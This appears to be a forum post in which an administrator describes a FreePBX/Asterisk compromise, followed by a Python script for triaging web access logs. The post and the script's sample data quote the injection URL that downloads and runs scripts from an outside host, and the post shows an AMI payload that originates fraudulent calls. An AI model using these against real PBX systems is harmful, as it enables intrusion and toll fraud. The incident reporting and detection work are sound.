Hi,
This is my first post here, so be gentle.
I just wondered if anyone had seen this issue before. Over the weekend we received a warning from our SIP provider that we were routing unusual numbers of calls through our FreePBX box (Asterisk 11.12.0 / FreePBX 2.11.0.38).
I checked the Asterisk logs and sure enough there were calls that shouldn't be there. Interestingly, they all started with:
Executing [007xxxxxxxxxx@doclickoutcontextnow7:1] NoOp("Local/xxxxxx@doclickincontextnow7-00000019;1", ""Click Out Context"") in new stack
This was odd because I'd never come across the context 'doclickoutcontextnow7' in my configuration, but sure enough, when I checked:
[doclickoutcontextnow7]
exten => _X.,1,NoOp("Click Out Context")
exten => _X.,n,Goto(from-internal,${EXTEN},1)
[doclickincontextnow7]
exten => _X.,1,NoOp("Click in Context")
exten => _X.,n,Answer(999999999999999999)
exten => _X.,n,Wait(999999999999999999)
had been added to the bottom of my extensions.conf. My first thought was 'ahh - I've been hit by Shellshock'; my second was 'well, if I have, it must have been through the web interface', so I checked the httpd logs and found:
xxx.xxx.xxx.xxx - - [27/Sep/2014:17:08:35 +0100] "GET /admin/modules/admindashboard/phpsysinfo/common_admin_functions.php?c=wget+-O+/tmp/c.sh+http://94.102.49.82/c2.sh;chmod+a%2bx+/tmp/c.sh;/tmp/c.sh+add;/usr/sbin/asterisk+-rx+'dialplan+reload';/usr/sbin/asterisk+-rx+'manager+reload';wget+-O+/tmp/c2.pl+http://94.102.49.82/c.pl; HTTP/1.1" 200 22 "-" "-"
So I checked my /tmp folder and found a c.sh script which was set up to modify extensions.conf accordingly, as well as c2.pl, which appears to make a connection to the Asterisk manager interface and initiate calls between two given numbers with the following code:
$payload = "Action: Login\r\n"
."Username: $user\r\n"
."Secret: $password\r\n\r\n"
."Action: Originate\r\n"
."Channel: Local/$phone@doclickincontextnow7\r\n"
."Context: doclickoutcontextnow7\r\n"
."Exten: $number\r\n"
."Priority: 1\r\n";
$payload .= "Async: yes\r\n";
$payload .= "Callerid: $phone\r\n\r\n"
."Action: Logoff\r\n\r\n";
I removed these files, then visited the URL:
http://<ip of my freepbx>/admin/modules/admindashboard/phpsysinfo/common_admin_functions.php?c=wget+-O+/tmp/c.sh+http://94.102.49.82/c2.sh;chmod+a%2bx+/tmp/c.sh;/tmp/c.sh+add;/usr/sbin/asterisk+-rx+%27dialplan+reload%27;/usr/sbin/asterisk+-rx+%27manager+reload%27;wget+-O+/tmp/c2.pl+http://94.102.49.82/c.pl;
in my web browser, and the exploit reinstalled itself. I've applied all the updates for CentOS and all the module updates for FreePBX, and the above link still installs the exploit even when I'm not logged into the web interface as an administrator.
I wondered whether
a) anyone else had seen this before
and
b) this is actually an exploit in common_admin_functions.php that should be fixed.
Now I'm pretty sure this isn't a Shellshock exploit, but I guess the moral of the story is not to leave your FreePBX box's admin interface open to the internet, especially on port 80, so I am no longer doing so. I'd be interested in people's feedback.
Regards
Mat
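As an added example (not the poster's code, nor anything shipped with FreePBX or Asterisk), the script below does the triage Mat describes by hand: it parses Apache combined-format access log lines, URL-decodes the query parameters of each request, flags values containing shell separators or download-and-execute commands, extracts the remote URLs and dropped /tmp paths as indicators, and lists dialplan contexts in an extensions.conf text that are not on an allow-list. It assumes the Apache combined log format; the marker list, the allow-list of known contexts and the sample log lines are constructed for the example (client IPs from the RFC 5737 documentation range, the request shape and attacker host taken from the log line quoted in the post).

```python
"""Triage helpers for a FreePBX web-interface command-injection compromise.

Added example: parameter names, marker strings and the context allow-list
are assumptions; the sample log lines and extensions.conf text are constructed.
"""
import re
from urllib.parse import unquote_plus

# Apache combined log prefix: client ident user [time] "METHOD target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Substrings that have no business in a query parameter of a PBX admin page (assumed list).
SHELL_MARKERS = (";", "|", "`", "$(", "wget ", "curl ", "chmod ", "/tmp/",
                 "asterisk -rx", "/bin/sh", "perl ")

URL_RE = re.compile(r"https?://[^\s;'\"]+")        # hosts the payload downloads from
PATH_RE = re.compile(r"/tmp/[A-Za-z0-9._-]+")      # files the payload drops


def split_query(target):
    """Split 'path?query' into (path, {name: [raw values]}).

    Splits on '&' only. The injected command uses ';' as a shell separator, and a
    query parser that also treats ';' as a parameter separator (older
    urllib.parse.parse_qs did) would cut the payload off after the first command.
    """
    path, _, query = target.partition("?")
    params = {}
    for pair in filter(None, query.split("&")):
        name, _, raw = pair.partition("=")
        params.setdefault(unquote_plus(name), []).append(raw)
    return path, params


def analyse_line(line):
    """Return a finding dict for a request carrying shell-like parameter content, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, params = split_query(m["target"])
    for name, raws in params.items():
        for raw in raws:
            cmd = unquote_plus(raw)   # 'wget+-O+/tmp/c.sh+...' -> 'wget -O /tmp/c.sh ...'
            markers = [t for t in SHELL_MARKERS if t in cmd]
            if not markers:
                continue
            return {
                "ip": m["ip"], "ts": m["ts"], "status": int(m["status"]),
                "path": path, "param": name, "command": cmd, "markers": markers,
                "remote_urls": sorted(set(URL_RE.findall(cmd))),
                "dropped_files": sorted(set(PATH_RE.findall(cmd))),
            }
    return None


def triage(log_lines):
    """All suspicious requests in an iterable of access-log lines."""
    return [f for f in map(analyse_line, log_lines) if f]


def unexpected_contexts(extensions_conf, expected):
    """Dialplan context names in an extensions.conf text that are not in `expected`."""
    found = re.findall(r"^\[([^\]]+)\]", extensions_conf, flags=re.M)
    return [c for c in found if c not in expected]


# Constructed sample log lines. Client IPs are RFC 5737 documentation addresses; the
# request path, payload shape and attacker host 94.102.49.82 follow the line quoted above.
SAMPLE_LOG = [
    '203.0.113.5 - - [27/Sep/2014:17:08:35 +0100] "GET /admin/modules/admindashboard/phpsysinfo/'
    'common_admin_functions.php?c=wget+-O+/tmp/c.sh+http://94.102.49.82/c2.sh;chmod+a%2bx+/tmp/c.sh;'
    '/tmp/c.sh+add;/usr/sbin/asterisk+-rx+%27dialplan+reload%27;/usr/sbin/asterisk+-rx+%27manager+reload%27;'
    'wget+-O+/tmp/c2.pl+http://94.102.49.82/c.pl; HTTP/1.1" 200 22 "-" "-"',
    '203.0.113.7 - - [27/Sep/2014:17:10:02 +0100] "GET /admin/config.php?display=extensions HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [27/Sep/2014:17:12:44 +0100] "POST /admin/config.php HTTP/1.1" 302 - "-" "Mozilla/5.0"',
]

# Constructed extensions.conf fragment: one legitimate context plus the two injected ones.
SAMPLE_EXTENSIONS_CONF = """[from-internal]
exten => _X.,1,NoOp(legit)
[doclickoutcontextnow7]
exten => _X.,1,NoOp("Click Out Context")
[doclickincontextnow7]
exten => _X.,1,NoOp("Click in Context")
"""

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} -> {f['path']} via parameter '{f['param']}'")
        print("  command :", f["command"])
        print("  fetches :", f["remote_urls"])
        print("  drops   :", f["dropped_files"])
    print("unexpected contexts:", unexpected_contexts(SAMPLE_EXTENSIONS_CONF, {"from-internal"}))
```

Run it against the real access_log with `triage(open("/var/log/httpd/access_log"))` and against the live dialplan text with the contexts your FreePBX install actually generates in the allow-list; the `remote_urls` and `dropped_files` fields give the hosts to block and the files to collect before cleaning up.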